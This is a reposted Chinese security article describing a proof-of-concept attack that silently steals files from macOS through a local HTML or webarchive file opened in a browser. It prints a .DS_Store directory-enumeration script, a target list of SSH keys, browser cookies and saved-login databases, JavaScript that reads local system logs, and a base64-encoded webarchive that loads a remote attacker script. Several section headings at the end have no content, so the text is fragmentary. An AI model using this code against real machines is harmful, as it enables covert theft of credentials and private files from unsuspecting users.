本文讲的是
如何通过简单的网页文件从macOS中盗取文件?,
文档、源码、ssh密钥、密码等等所有的这些文件都可以传送过去。不可能吗?当然是可能的。一些常用的浏览器可能正在这样做。
1. 用户在浏览器中打开html文件 2. 浏览器读取用户有权限访问的文件列表。 3. 浏览器读取重要文件,并且将他们上传到攻击者启动的远程服务器中,这一过程会在后台进行,并且不会通知用户。
阶段一:在当前用户计算机上收集关于文件的信息。 阶段二:读取文件,将文件上传到远程服务器上。
得到目录列表
##!/usr/bin/env python from ds_store import DSStore import json path = ‘/Users/USERNAME/.DS_Store’ def parse(file): filelist = [] for i in file: if i.filename!=’.’: filelist.append(i.filename) return list(set(filelist)) d=DSStore.open(path, ‘r+’) fileresult=parse(d) print(json.dumps(fileresult)) for name in fileresult: try: d = DSStore.open(path + name+ ‘/.DS_Store’, ‘r+’) fileresult = parse(d) all.append(fileresult) print(json.dumps(fileresult)) except: pass
$ python parse_ds_store.py [“Documents”, “Pictures”, “.idm”, “Desktop”, “Music”, “.oracle_jre_usage”, “Public”, “tmp”, “Parallels”, “MEGA”, “.BurpSuite”, “Downloads”, “.config”, “.cache”, “Applications”, “.bash_sessions”, “Creative Cloud Files”, “PycharmProjects”, “Applications (Parallels)”, “Dropbox”, “Nextcloud”, “.iterm2”, “.Trash”, “Scripts”, “Movies”, “MEGAsync Downloads”, “Soft”, “.local”, “.ssh”, “Library”, “.pgadmin”]
[“Backups","Soft","Pictures",".ssh"...][
[“2017”, “2016”, “2015”, …]
[“source”, “sql”, “static”, …]
预测有价值信息的文件路径
~/.ssh/id_rsa; ~/.ssh/id_rsa.key; ~/.ssh/id_rsa.pub; ~/.ssh/known_hosts; ~/.ssh/authorized_keys;
~/Library/Cookies/Cookies.binarycookies ~/Library/Cookies/com.apple.Safari.cookies
~/Library/Cookies/HSTS.plist
~/Library/Accounts/Accounts4.sqlite
~/Library/Application Support/
~/Library/Application Support/Google/Chrome/Default/Login Data ~/Library/Application Support/Google/Chrome/Default/Cookies ~/Library/Application Support/Google/Chrome/Default/History
悄无声息的访问用户文件
function getUser() { var xhr = new XMLHttpRequest(); try { xhr.open(‘GET’, ‘/var/log/system.log;/https:%2f%2fgoogle.com/’, false); xhr.send(); return xhr.responseText.match(//Users/w+//g)[0]; } catch (e) { xhr.open(‘GET’, ‘/var/log/install.log;/https:%2f%2fgoogle.com/’, false); xhr.send(); return xhr.responseText.match(//Users/w+//g)[0]; } }
得到文件
<?xml version=”1.0" encoding=”UTF-8"?> <!DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN” “http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version=”1.0"> <dict> <key>WebMainResource</key> <dict> <key>WebResourceData</key> <data> PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQgc3JjPSdodHRwczo vL2JvMG9tLnJ1L3NhZmFyaV9wb2MvcmVhZGZpbGUuanMnPjwvc2NyaXB0Pj wvYm9keT48L2h0bWw+ </data> <key>WebResourceFrameName</key> <string></string> <key>WebResourceMIMEType</key> <string>text/html</string> <key>WebResourceTextEncodingName</key> <string>UTF-8</string> <key>WebResourceURL</key> <string>file:///</string> </dict> </dict> </plist>
如何解决数据来源问题?
该怎么办?
原文发布时间为:2017年8月7日
本文作者:xnianq
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。